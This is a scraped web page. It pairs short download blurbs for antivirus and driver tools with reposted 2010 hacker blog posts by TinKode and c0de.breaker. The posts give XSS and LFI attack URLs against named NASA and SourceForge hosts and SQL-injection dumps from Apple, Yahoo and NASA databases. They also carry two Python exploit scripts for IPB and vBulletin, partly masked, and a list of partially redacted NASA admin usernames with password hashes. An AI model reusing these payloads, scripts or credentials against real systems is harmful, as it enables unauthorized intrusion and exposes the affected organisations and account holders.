Kaspersky Mobile Security

Download Kaspersky Mobile Security

Features

• Protects Privacy - for your eyes only
• Locates a lost or stolen smartphone
• Secures contacts, photos and files from unauthorized access
• Blocks unwanted calls or SMSs
• Has Parental control
• Protects your smartphone from malware and network attacks

Read More

Avast Free Antivirus 6

Download Avast Free Antivirus 6 

The latest version of avast! antivirus kernel features outstanding detection abilities, together with high performance. You can expect 100% detection of In-the-Wild viruses (viruses already spreading between users) and excellent detection of Trojan horses.
The avast! engine also features outstanding unpacking support. It can scan inside the following archives: ARJ, ZIP, MIME (+ all associated formats), MAPI (Outlook pst files), DBX (Outlook Express archives), RAR, TAR, GZIP, CAB, BZIP2, ZOO, ACE, ARC, LHA/LHX, TNEF (winmail.dat), CPIO, CHM, RPM, ISO, 7ZIP and SIS. It also supports a number of executable packers (such as PKLite, Diet, UPX, ASPack, PeShield, FSG, MEW etc.).
Resident protection (the real-time protection of the operating system), is one of the most important parts of an antivirus program today. avast! features a powerful resident module that is able to detect a virus before it has any chance to infect your computer. avast! Home Edition contains resident protection of the computer file system and a resident module for e-mails and news.
Avast features a module for the protection of IM (Instant Messaging, "chat") programs, and a module for the protection of P2P (peer-to-peer) programs. The list of supported IM and P2P programs is extensive with more than 30 programs currently supported.

Read More

3DP Chip and 3DP Net

Download 3DP Chip

Download 3DP Net

Ever had painful headaches searching through the web trying to find the correct drivers for your newly formatted PC?
3DP Chip and 3DP Net are extremely useful freewares that will minimize your effort and time spent in finding the drivers for your PC components!
3DP Net has the ability to automatically install the right network driver for your PC even if you reinstalled Windows and cannot connect to the internet due to the absence of appropriate driver. 3DP Net will detect which network adapter is installed on your PC and automatically choose the right driver from its integrated ethernet card driver pool that enables to use the internet with breeze.
3DP Chip is another useful program that will automatically detect and display the information on your CPU, motherboard, video card and sound card installed on your PC. You can also choose to copy these information into your clipboard with one click for later use (such as posting in a forum). If you have working internet connection, you can choose to download the latest drivers for all of these components.
We recommend you to run 3DP Net first after reinstalling Windows to detect network adapter and install driver, then once you get hold of internet connection, run 3DP Chip for other component drivers.

Read More

TinKode-How to find XSS in NASA

How to find XSS in NASA

Posted by isrtinkode on February 16, 2010

__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\

#How to find XSS in NASA?

Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.

Link google:

http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N

Link Nasa XSS:

http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E

Yeah, this XSS is indexed on google, LOL.

Another XSS in NASA:

1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E

2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E

4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E

5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E

6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E

etc

Read More

TinKode-SourceForge LFI

SourceForge LFI

Posted by isrtinkode on February 18, 2010

 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/

Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).

http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf

For more informations read a tutorial about LFI.

Read More

TinKode-APPLE Vulnerable to Blind SQLi

APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010

          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode

@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.

Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.

Testing:

Now let’s see the version

#Version: 5
#Databases: locator_asia, test

#Tables from “locator_asia” database

[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log

#Tables from “test” database

[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp

Columns from “reseller_city_utf8” table

[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4

A good thing is that there is nothing important to extract…
Great, good bye, TinKode

Read More

TinKode-Yahoo Blind SQL Injection

Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

In this picture we can see as SELECT work

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Read More

TinKode-IPB Full Disclosure Exploit [Python]

IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(********) == 3: try: print("Please wait...") if args[1] == "********": extract_parse_save(********)) elif args[1] == "********": download_data(********]) except Exception as message: print("An error occurred: ********)) except: print("Unknown error.") else: print(********") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with ********.********) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[********):] value = source[:source.index(********)] hurl = url ********.format(********) else: print("[!]Token not found.") print("[+]********...") with urllib.request.******** as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find(********) if index != -1: lastk = line[index + ********" ").strip(********) index = line.find(********") if index != -1: lastv = line[index + ********:line.index("********")].********(" ") if lastk != None and lastv != None: index = ********") if index in (********, 0): lastk = "[other] {}".format(lastk) else: lastk = "[********}".format(********) dictionary[********astv ******** = None, None print("[+]Organizing and saving paths...") with open("********", "********") as fout: fout.write(********) keys = sorted(********) for key in keys: fout.write(********)) def download_data(files): print("[+]Searching ********...") mthreads = ******** with open(********) as fin: url = fin.readline()********) if files.find("*") == -1: hurl = ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = l********) if pieces[0].count(ext) == 1: upath = pieces[1] hurl = ********) while threading.active********reads: pass Download(********) while threading.active_count(******** pass class Download(********): def __********): threading.Thread.********) ******** = url def run(self): try: with urllib.request.urlopen(********usock: data = ********) uparser = urllib.parse.urlparse(********) pieces = uparser.********) ******** = pieces[********] with open(********) as fout: fout.********) except: pass ********__main__": main()

You must have python 3.1 to work!

Read More

TinKode-vBulletin Full Disclosure [Python]

vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(********)) elif args[1] == "********": download_data(********) except Exception as message: print("An error occurred: {}".********) except: print("Unknown error.") else: print(********) else: print(usage) input() def extract_parse_save(url): print("[+]********...") hurl = url + "/validator.php" with urllib.request.******** as usock: source = ********() print("[+]Finding ********") word = "validate('" source = source[source******** + len(word):] value = ********] print("[+]Obtaining paths...") hurl = url + "/validator********(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = ********() index = ********") if index != -1: lastk = line[index ********(" ") index = line.find("********") if index != -1: lastv = line********) if lastk != None and lastv != None: index = ********) if index in (-1, 0): lastk = "********) else: lastk = "[{}] {}".format(********) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open(********) as fout: fout.********) keys = sorted(dictionary.keys()) for key in keys: fout.write********(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") ******** = 50 with open("********) as fin: url = fin.readline(********) if files.find******** hurl = url + ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = line********) if pieces[0].******** upath = pieces[1] hurl = ********) while threading.active_********) > ******** pass Download(********).start() while threading.********) > 1: pass class Download(********): def __init__(self, url): threading.Thread.__********) self.url = ******** def run(********): try: with urllib.request.urlopen(self.url) as usock: data = ********() uparser = urllib.parse.urlparse(********) pieces = ********.********) fname = pieces[********] with open(********) as fout: ********.write(data) except: pass ********"__main__": main()

You need python 3.1 to work!

Read More

TinKode-NASA 2 Websites Full Access

NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010

 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|

      #owned by c0de.breaker

I had access to:

www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov

Some screens:

http://i44.tinypic.com/vnjl10.png

http://i41.tinypic.com/25j9zle.png

http://i37.tinypic.com/294t26t.png

http://i35.tinypic.com/qnpf9y.png

http://i38.tinypic.com/23r5mw.png

http://i37.tinypic.com/2rfe92u.png

http://i35.tinypic.com/a57s5e.png

Informations:

#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****

Tables from “*****” database:

#access
#branch
#docs
#docsbranch
#intro
#programs

Columns from “access” table:

#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp

Admins Accounts:

http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx

http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx

I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc

#Finish, c0de.breaker

Read More

TinKode-NASA Full-Disclosure! AGAIN

NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010

 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/

              #Full Disclosure... c0de.breaker

#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I’m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc

The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)

Testing:

Informations:

#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:

Bad…

Other Databases:

#ceossadb
#information_schema
#mysql
#ceosvis

Tables from “ceosvis” database:

#instrument
#takes
#measurement
#contains
#mission

Tables from main Database:

#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)

Read More